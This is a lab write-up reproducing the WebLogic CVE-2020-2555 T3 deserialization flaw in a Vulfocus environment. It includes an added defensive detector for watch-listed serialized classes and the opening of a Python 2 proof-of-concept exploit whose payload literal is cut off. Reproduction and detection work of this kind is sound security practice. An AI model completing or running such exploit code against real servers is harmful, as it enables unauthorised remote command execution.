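WebLogic CVE-2020-2555 Vulnerability Reproduction
Vulnerability overview:
This vulnerability was disclosed online in January 2020 and is a WebLogic deserialization vulnerability. It is caused by a flaw in Oracle Coherence, a component of Oracle Fusion Middleware: an attacker can exploit it without authorization by sending a crafted T3 protocol request, obtaining WebLogic server privileges and executing arbitrary commands.
Vulnerability reproduction:
Pull, download and start the vulnerable image environment on the Vulfocus platform:
Access the vulnerable environment on port 11317, which is mapped to WebLogic's service port 7001. In the browser's address bar, enter the IP and port followed by console to open it.
Download the attack PoC from GitHub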
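For defenders, the T3 exposure described above can be monitored on the wire. The following is an added example, not part of the original post or of any Oracle tooling: it checks a reassembled client-to-server TCP stream for a T3 handshake and lists the class names of the serialized Java objects it carries, because T3 transports serialized objects legitimately and the class name is what separates expected traffic from suspect traffic. The function names, the sample stream and the `com.example.*` class names are constructed for illustration.

```python
import struct

STREAM_MAGIC = b"\xac\xed\x00\x05"    # Java serialization header: magic 0xACED, version 5
TC_OBJECT, TC_CLASSDESC = 0x73, 0x72  # type codes that open a new object and its class descriptor


def is_t3_handshake(stream: bytes) -> bool:
    """True if the client stream opens with a T3 handshake line such as 't3 12.2.1'."""
    return stream.split(b"\n", 1)[0].startswith(b"t3 ")


def serialized_classes(stream: bytes):
    """Yield (offset, class_name) for each object whose class descriptor follows a stream header."""
    pos = stream.find(STREAM_MAGIC)
    while pos != -1:
        body = stream[pos + 4:]
        if len(body) >= 4 and body[0] == TC_OBJECT and body[1] == TC_CLASSDESC:
            (name_len,) = struct.unpack(">H", body[2:4])
            name = body[4:4 + name_len]
            if len(name) == name_len:  # skip descriptors cut off by the capture
                yield pos, name.decode("utf-8", "replace")
        pos = stream.find(STREAM_MAGIC, pos + 1)


def flag_t3_stream(stream: bytes, watchlist):
    """Return (offset, class_name) pairs for watch-listed classes inside a T3 client stream."""
    if not is_t3_handshake(stream):
        return []
    return [(off, cls) for off, cls in serialized_classes(stream) if cls in watchlist]


def _obj(name: str) -> bytes:
    """Build the first bytes of a serialized object for the constructed sample below."""
    raw = name.encode()
    return STREAM_MAGIC + bytes([TC_OBJECT, TC_CLASSDESC]) + struct.pack(">H", len(raw)) + raw


# Constructed sample: handshake, filler, two objects, then a truncated descriptor.
HANDSHAKE = b"t3 12.2.1\nAS:255\nHL:19\n\n"
SAMPLE = (
    HANDSHAKE + b"\x00" * 8 + _obj("com.example.Allowed") + b"\x01\x02"
    + _obj("com.example.Watched") + STREAM_MAGIC + b"\x73\x72\x00\x40short"
)
WATCHLIST = {"com.example.Watched"}  # constructed; fill with classes your environment should never receive

if __name__ == "__main__":
    print(flag_t3_stream(SAMPLE, WATCHLIST))
```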
# -*- coding: utf-8 -*-
# Python 2 script (uses the urlparse module)
import socket
import time
import ssl
import binascii
import urlparse
import argparse
import sys

globalProxies = {}
header = {
    'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0"
}


def parseUrl(url):
    # Split the target URL into (scheme, host, port, path)
    parsed = urlparse.urlparse(url)
    proto = parsed.scheme
    netloc = parsed.netloc
    ip = netloc
    # Default port by scheme, overridden when the URL names one explicitly
    if proto == 'http':
        port = 80
    else:
        port = 443
    if (':' in netloc):
        ip = netloc.split(':')[0]
        port = netloc.split(':')[1]
    uri = parsed.path
    return (proto, ip, port, uri)


def CVE_2020_2555(cmd):
    payload_start = '...'  # hex-encoded serialized Java object; the literal is cut off on the page